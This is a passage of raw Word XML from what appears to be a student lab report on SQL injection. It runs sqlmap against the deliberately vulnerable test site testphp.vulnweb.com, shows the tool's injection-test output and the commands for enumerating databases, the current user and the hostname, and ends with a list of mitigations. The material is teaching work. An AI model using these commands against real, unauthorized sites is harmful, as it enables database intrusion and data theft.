          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="5182235"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1411672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72035" name="Picture 1411672035"/>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5182235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE5BA1" w:rsidRPr="003F5C77" w:rsidRDefault="00AE5BA1" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE5BA1" w:rsidRDefault="009E31EB" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>From the sql injection we get following results:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC296D" w:rsidRPr="009E31EB" w:rsidRDefault="00EC296D" w:rsidP="00AE5BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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'Generic inline queries'</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 xml:space="preserve">testing 'MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                                                                                               </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5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'</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5.5 OR error-based - WHERE or HAVING clause (EXP)'</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5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'</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5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'</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5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'</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5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'</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 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'</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 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'</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AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'</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OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'</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AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'</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OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'</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4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'</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4.1 OR error-based - WHERE or HAVING clause (FLOOR)'</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OR error-based - WHERE or HAVING clause (FLOOR)'</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error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'</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5.5 error-based - Parameter replace (BIGINT UNSIGNED)'</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5.5 error-based - Parameter replace (EXP)'</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5.6 error-based - Parameter replace (GTID_SUBSET)'</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5.7.8 error-based - Parameter replace (JSON_KEYS)'</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 error-based - Parameter replace (FLOOR)'</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error-based - Parameter replace (UPDATEXML)'</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error-based - Parameter replace (EXTRACTVALUE)'</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inline queries'</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stacked queries (comment)'</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considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)</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stacked queries'</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stacked queries (query SLEEP - comment)'</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stacked queries (query SLEEP)'</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&lt; 5.0.12 stacked queries (BENCHMARK - comment)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE5BA1" w:rsidRPr="003F5C77" w:rsidRDefault="00242F2F"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w:t>
      </w:r>
      <w:r w:rsidR="00AE5BA1" w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sting 'MySQL &lt; 5.0.12 stacked queries (BENCHMARK)'</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AND time-based blind (query SLEEP)'</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OR time-based blind (query SLEEP)'</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AND time-based blind (SLEEP)'</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OR time-based blind (SLEEP)'</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 xml:space="preserve">GET parameter 'artist' appears to be 'MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)' injectable </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'Generic UNION query (NULL) - 1 to 20 columns'</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automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found</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'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test</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target URL appears to have 3 columns in query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242F2F" w:rsidRPr="003F5C77" w:rsidRDefault="00242F2F" w:rsidP="00242F2F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Results are saved in this path '/home/kali/.local/share/sqlmap/output/results-02252024_1012am.csv'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242F2F" w:rsidRPr="003F5C77" w:rsidRDefault="00242F2F" w:rsidP="00242F2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF37D4" w:rsidRPr="003F5C77" w:rsidRDefault="00AF37D4" w:rsidP="00242F2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Using the following command </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF37D4" w:rsidRPr="003F5C77" w:rsidRDefault="00AF37D4" w:rsidP="00242F2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat '/home/kali/.local/share/sqlmap/output/results-02252024_1012am.csv'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242F2F" w:rsidRDefault="003F5C77" w:rsidP="00242F2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs –batch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C77" w:rsidRPr="003F5C77" w:rsidRDefault="003F5C77" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>provide databases and its names in the SQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C77" w:rsidRDefault="003F5C77" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="5844540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="197757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78189" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="5844540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C77" w:rsidRPr="003F5C77" w:rsidRDefault="003F5C77" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Here data found like version, user database name etc as shown in above image.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C77" w:rsidRDefault="003F5C77" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="6614160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8153431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43193" name="Picture 815343193"/>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6614160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="5410200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19142042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04203" name="Picture 1914204203"/>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5410200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C77" w:rsidRDefault="003F5C77" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003F5C77" w:rsidRDefault="003F5C77" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Here there are 3 tables are found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C77" w:rsidRDefault="003F5C77" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003F5C77" w:rsidRDefault="00444CCB" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="003F5C77" w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --current-user --current-db </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="003F5C77" w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00444CCB" w:rsidRDefault="00444CCB" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>By using this command we can found current user, current database, hostname as shown in below image.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00444CCB" w:rsidRDefault="00444CCB" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00444CCB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5258256" cy="1760373"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="781556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56026" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5258256" cy="1760373"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00444CCB" w:rsidRDefault="00444CCB" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00444CCB" w:rsidRDefault="00444CCB" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Here we are trying to find tables and dump them as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C77" w:rsidRDefault="003F5C77" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="5951220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7613322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32232" name="Picture 761332232"/>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5951220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00444CCB" w:rsidRDefault="00444CCB" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00444CCB" w:rsidRPr="003F5C77" w:rsidRDefault="00565052" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Here are the resultant tables given below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C77" w:rsidRDefault="003F5C77" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2727960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2765293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29367" name="Picture 276529367"/>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727960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00444CCB" w:rsidRDefault="00444CCB" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00444CCB" w:rsidRPr="003F5C77" w:rsidRDefault="00444CCB" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003F5C77" w:rsidRDefault="00821185" w:rsidP="00EC296D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="003F5C77" w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mita</w:t>
      </w:r>
      <w:r w:rsidR="003F5C77" w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC296D" w:rsidRPr="00EC296D" w:rsidRDefault="00EC296D" w:rsidP="00EC296D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF5C36" w:rsidRDefault="00CF5C36"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5C36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="111111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Ethical Considerations</w:t>
      </w:r>
    </w:p>
    <w:p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rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="111111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Encrypt private/confidential data being stored in the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5C36" w:rsidRDefault="00CF5C36"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5C36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="111111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Detection Dependency</w:t>
      </w:r>
    </w:p>
    <w:p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rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="111111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Use a Web Application Firewall (WAF) for web applications that access databases</w:t>
      </w:r>
    </w:p>
    <w:p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rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="111111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Use secure coding and SDLC practices</w:t>
      </w:r>
    </w:p>
    <w:p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rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="111111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Use input validation and sanitation</w:t>
      </w:r>
    </w:p>
    <w:p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rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="111111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Use stored procedures and parametrization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5C36" w:rsidRDefault="00CF5C36"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5C36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="111111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Complex Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p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rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="111111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Use program analysis techniques and proxies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C77" w:rsidRPr="003F5C77" w:rsidRDefault="003F5C77" w:rsidP="003F5C77">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003F5C77" w:rsidRPr="003F5C77" w:rsidSect="00D6123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21670C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D28D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93D40D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6608E0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1320447"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6CFC9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1E53B02"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
